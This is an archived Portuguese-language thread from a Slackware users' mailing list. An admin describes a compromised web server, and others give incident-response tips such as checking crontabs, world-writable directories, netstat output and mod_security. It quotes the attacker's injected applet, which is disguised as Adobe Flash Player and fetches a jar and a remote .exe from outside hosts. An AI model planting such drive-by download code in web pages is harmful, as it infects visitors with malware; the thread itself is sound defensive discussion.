Valeu Victório, vou fazer esse pente fino ai, agora tem muita coisa pra ficar atento. Se eu descobrir mais coisas respondo aqui na lista.
Obrigado a todos, ajudaram bastante. Jorge 2009/8/12 Fábio <[email protected]> > > Nunca uso php sem "safe_mode on" :) > > Att: Fábio Gomes dos Santos > > Victório escreveu: > > Vamos lá. Eu já passei por isso algumas vezes e, em todos os meus casos > foi > > falha de programação do site rodando no servidor. Fora todas as dicas que > o > > pessoal já disse: > > > > 1. Verifique se foram adicionados agendamentos no seu cron: > > > > for i in `cat /etc/passwd|cut -d: -f1`; do echo user: $i; crontab -u $i > -l; > > done > > > > 2. Verifique por arquivos estranhos em _todos_ os diretórios com > permissão > > de escrita para todos os usuários, por ex. > > > > /tmp > > /var/tmp > > /var/spool/* (sim temos diretórios abertos no /var/spool) > > > > muitos arquivos estão em como /var/tmp/.../botircmaldito > > > > 3. Pesquise em todos os diretórios do seu servidor web por arquivos cujo > > dono seja o usuário do seu servidor web para tentar descobrir mais > arquivos > > suspeitos. Provavelmente você deve ter um phpshell no seu servidor para > > facilitar a vida do cara que jogou o vírus aí. > > > > 4. Verifique os processos que tem conexões com a internet. 2 servidores > meus > > tiveram bot irc e os nomes dos processos estavamos escondidos com o xhide > > (programinha muito bom). Você pode usar o netstat. como netstat -anp > |grep > > -vi unix (isso é o basico mas já pega muita coisa) > > > > 5. Se seu servidor já estava com todos os softwares atualizados, então a > > chance de ser uma falha em alguns deles é pequena. Nesse caso o cara deve > > ter jogado os arquivos por algum site no seu servidor que permita o > upload > > de arquivos. > > > > 6. Muito trabalhoso, mas tente colocar o mod_security no apache. Pelo > menos > > coloque ele no modo de DetectionOnly para ter os logs > > > > ############################################### > > Victório Felipe > > http://www.wa.pro.br > > linux user #306117 - counter.li.org > > Slackware Linux FreeBSD > > Because it works! The Power To Serve > > ############################################### > > > > > > 2009/8/11 Jorge Filho <[email protected]> > > > >> Olá pessoal, obrigado pelas ajudas. > >> O que eu consegui rastrear até agora foi o seguinte, o cara conseguiu > >> editar o index.php do site e colocou o seguinte applet: > >> > >> <applet name="Adobe FlashPlayer" code="Inicio.class" archive=" > >> http://www.exemplo.com/audio/FlashPlayer.jar" height="10" width="1"> > >> <param name="url" value=" > >> http://merlincosmeticos.com.br/cache/foto125.exe"> > >> </applet> > >> > >> Ele também adicionou esse FlashPlayer.jar no diretório audio do > servidor, e > >> tinha também esse arquivo asd.html na raiz. > >> As datas dos arquivos são: > >> > >> -rw------- 1 www-data www-data 9,8K 2009-08-10 22:53 FlashPlayer.jar > >> -r-xr-xr-x 1 www-data www-data 12K 2009-08-11 14:03 index.php > >> > >> No logo do /var/log/apache/access.log está o seguinte: > >> > >> 201.78.54.160 - - [10/Aug/2009:15:03:17 -0300] "GET /asd.html HTTP/1.1" > 200 > >> 808 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.13) > >> Gecko/2009073022 Firefox/3.0.13" > >> 189.26.198.238 - - [10/Aug/2009:15:07:01 -0300] "GET /asd.html HTTP/1.1" > >> 200 808 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) > >> Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" > >> 189.26.198.238 - - [10/Aug/2009:15:07:39 -0300] "GET /asd.html HTTP/1.1" > >> 304 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) > >> Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" > >> 189.26.198.238 - - [10/Aug/2009:15:09:43 -0300] "GET /asd.html HTTP/1.1" > >> 304 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) > >> Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" > >> 201.89.53.126 - - [10/Aug/2009:15:48:12 -0300] "GET /asd.html HTTP/1.1" > 200 > >> 808 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; > >> SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30618)" > >> > >> Se procurar FlashPlayer.jar no log então, acha muito, porque muita gente > >> deve ter baixado. > >> > >> Outra coisa que acho que pode ser uma falha na segurança também é que > todos > >> os arquivos estavam com permissão 777 > >> > >> Sobre o ftp, tem alguns usuários com senha fraca sim, mais o ftp roda em > >> chroot com autenticação mysql, o usuário já cai na pasta sem ter como > sair, > >> acho dificil ter acontecido algo pelo ftp, mas claro, nada é impossível. > >> > >> Vou analisar mais coisas aqui, mas to meio confuso, é a primeira vez que > >> tenho um ataque no servidor, situação estranha, mais agora tenho que > >> aprender como o cara fez isso pra consertar o que tá errado. > >> > >> > >> 2009/8/11 Herbert Faleiros <[email protected]> > >> > >> > >>> On Tue 11 Aug 2009 18:19:12 Jorge Filho wrote: > >>>> Hoje aconteceu algo muito estranho no meu server web, de manhã, quando > >>>> alguém entrava no site aparecia uma tela pedindo pra executar um > >>>> javascript. Qual não foi minha surpresa quando vi um arquivo diferente > >>> na > >>>> raiz do meu site, com nome de asd.html? > >>>> > >>>> Com é possível isso ter acontecido? Que tipo de configuração eu devo > >>>> verificar se tem problema? Fiquei sem saber o que fazer. > >>> > >>> examine seus logs, com certeza vai encontrar mais informações... > Verifique > >>> os > >>> softwares em execução e procure atualizações de segurança. Execute > >>> ferramentas > >>> p/ buscar por rootkits e exploits e verifique quem tem mais acesso ao > seu > >>> sistema (tá com cara de que isso foi "manual"). > >>> > >>> -- > >>> Herbert > >>> > >>> > >>> > >>> > > > > > > > > > > > > --~--~---------~--~----~------------~-------~--~----~ GUS-BR - Grupo de Usuários de Slackware Brasil http://www.slackwarebrasil.org/ http://groups.google.com/group/slack-users-br Antes de perguntar: http://www.istf.com.br/perguntas/ Para sair da lista envie um e-mail para: [email protected] -~----------~----~----~----~------~----~------~--~---

